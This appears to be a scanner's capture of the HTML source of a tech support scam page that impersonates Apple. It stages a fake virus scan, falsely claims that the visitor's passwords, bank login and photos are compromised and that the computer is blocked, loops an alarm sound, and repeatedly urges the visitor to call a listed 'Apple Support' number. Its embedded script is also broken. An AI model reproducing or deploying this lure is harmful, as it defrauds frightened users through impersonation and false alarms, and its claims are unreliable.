Last Checked: Feb 02, 2024, 11:48 EST

IP Address:
Location: Unknown, Unknown, Unknown
URL Reputation:
  • Unknown This URL is not identified as malicious in the PhishTank Database.
  • Unknown PhishCheck thinks this URL is likely not a phish.
  • Unknown OpenPhish: URL not in feed.

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  • GET
    200 OK


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<p style="font-size: 17px; font-weight:600; font-family: Arial, Helvetica, sans-serif;">Apple Security<img src="minimize.jpeg" class="" style="float: right; width:115px;"></p>

<h4 style="position: absolute; left: 70px; top: 53px; font-weight: 300;" id="text1">Safety at a glance</h4>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>Check what is happening to the safety and health of your device and take all necessary measures.</p>
<div class="centerright">
<img src="kxFy-clip.png" width="50px;">
<p>Apple Security Protection</p>
<p style="top: 103px; position: absolute; font-size: 13px; color: grey;">action is required. Run a scan to check for <br>threats.</p>

<img src="qsbs-firewall.png" width="60px;">
<p>Firewall and network protection</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
<img src="s-S4-acc.png" width="60px;">
<p>Account protection</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
<img src="Z5BR-network.png" width="51px;">
<p>Application and browser control</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
<img src="uZbx-si.png" class="" style="border-bottom-left-radius: 10px;" id="clscl" width="30.9px; height: 15.2px;">

<!--Apple Security Quick Scan-->
<div class="scan" id="scan" style="display: block;">
  <div class="top">
  <p style="font-size: 17px; font-weight:600; font-family: Arial, Helvetica, sans-serif;">Apple Security<img src="minimize.jpeg" class="" style="float: right; width:115px;"></p>
  <h4 style="position: absolute; left: 70px; top: 53px; font-weight: 300;" id="text1"><img src="apple.png" style="margin-right: 10px;vertical-align: sub;" width="25px;">Apple Security Protection</h4>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">Device protection against threats.</p>

<h3 style="    position: absolute;
right: 150px;
top: 6px;
font-weight: 500;
font-size: 19px;" id="text12"><b>+1-833-487-9008  (free security)</b></h3>

  <div class="centerright">


  <div class="flex"> <img src="-EBq-current.png" style="margin-right: 10px; top: 10px; position: absolute;" width="20px" height="20px;"><p style="font-weight: 400; position: absolute; left: 30px;">current threat</p></div>

  <div class="progress" id="bar">
    <div class="progress__bar"></div>

  <p style="font-size: 13px;" id="info">Quick scan in progress...<br>Estimated time remaining: <n id="time">0:00:30</n><br><n id="amount">685</n></p>

  <a href="#" class="button" id="re">To cancel</a>
  <p style=" font-size: 13px;" id="recx">Keep working while we analyze your device.</p>

  <p style="font-size: 13px; color: #0063c6; cursor: pointer;" id="recx-hide">protection history</p>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer;">Scan Options<br> Allowed Threats<br> Protection History</p>



<div class="flex"><img src="nOxp-sett.png" style="margin-right: 10px;" width="30px;" height="28px"><p style="position: absolute; left: 35px;    bottom: 117px;    line-height: 18px;">Virus &amp; threat protection settings </p> </div>
<p style="color: grey; font-size: 13px;">no action required</p>
<p style="font-size: 13px; color: #0063c6;">Manage your settings</p>


  <p style="position: absolute; top: -55px;">I have a question?</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer;">get help</p>


    <p style="position: absolute; top: 25px;">who will protect me ?</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer;">Supplier management</p>


      <p style="position: absolute; top: 100px; "><br>Help us improve Apple Security</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer;">Send us your feedback</p>


        <p style="position: absolute; top: 190px;">Change your privacy settings</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">View and change privacy settings on Mac<br><n id="which"></n> devices.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer;">Privacy Settings<br>Privacy Dashboard<br>Privacy Statement</p>



  <img src="uZbx-si.png" class="" style="border-bottom-left-radius: 10px;" id="clscl" width="30.9px; height: 15.2px;">
   .then(ua => {
     if (navigator.userAgentData.platform === "Apple") {
       const majorPlatformVersion = parseInt(ua.platformVersion.split('.')[0]);
       if (majorPlatformVersion >= 13) {
        document.getElementById("which").innerHTML = " 11";
        else if (majorPlatformVersion > 0) {
          document.getElementById("which").innerHTML = " 10";
        else {
     else {
       console.log("does not work on Mac");

<div class="alert_popup cardcontainer mnwebs">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;">Apple Security - Protection Warning</p>
                <p class="text-center">** Access to this PC has been blocked for security reasons **</p>
                <p>Your computer has been warned that it is infected with Unknown Error code: #0x6D9. The following data was compromised: <br><br>
                  &gt; Email ID<br> &gt; Bank Password<br>
                  &gt; Facebook Login<br>
                  &gt; Photos and Photo Documents </p>

                  <p>A Apple Security scan has detected potentially unwanted adware on this device that can steal your passwords, online identities, financial information, personal files, images, or documents. </p>
                  <!-- <p>Please contact us immediately so that our engineers can explain the removal process over the phone. <br><br> -->

                   <p> Please contact Apple Support immediately to report this threat, prevent spoofing, and unlock access to this device. <br><br>
                    Closing this mac puts your personal information at risk and interrupts your mac registration.</p>

               <p style="padding-bottom: 0px;">Call Apple Support <strong>+1-833-487-9008  (Security Support)</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: pointer;">Have understood</a> <a class="" id="leave_page">To cancel</a> </div>

<audio id="beep" loop="">
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<div id="websa" class="websa mnwebs">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="apple.png" class="logo3"></span> Apple_Defender_Security_Center</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="cross.png"></a></span>

  <div id="txtintro">
              <span class="colo-rd">Application: Ads.financetrack(x07).dll<br>
                Threats_Detected:Stuxnet. Unknown_Error_code: #0x6D09</span>
  <img id="banner" src="virus-images.png">
  <div id="disclaimer">
    Access to this PC has been blocked for security reasons.<br>
      <span class="support">Contact Apple Support: +1-833-487-9008  (Security Support)</span>
  <div id="bottom">
      <img id="badge" src="apple.png"><span class="title3">Apple Support</span>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">Deny</span>
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                      <span id="addtochromebutton">Allow</span>


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      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt" style="font-weight: 700;"><img src="apple.png"> Apple</span><span style="font-weight: 700;padding-left: 5px;color: #fff;">Support contact <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">+1-833-487-9008  (Security Support)</span></span>
      <div class="col-md-12">
          <marquee direction="left" width="100%" height="100px"><small class="text-left" style="color: #eee;font-size: 10px;">Apple
            Defender SmartScreen prevented unrecognized apps from displaying. Running this app may put your PC
            at risk. Apple Defender Scan has found unwanted adware that may steal on this device
            passwords, online IDs, financial information, personal files, photos, or


<div id="welcomeDiv" style=" display:none; background-color:#000; height: auto; width: 550px;left:32%;position: absolute;z-index: 9999999999;text-align: center;top: 0; " class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">Do not reboot or use
      Your computer.<br>Your computer is disabled. Please, call Apple Support. <br>Access is the block security reason for this
      Computer. <br>Please contact us immediately. A technician will help you solve the problem.</p>


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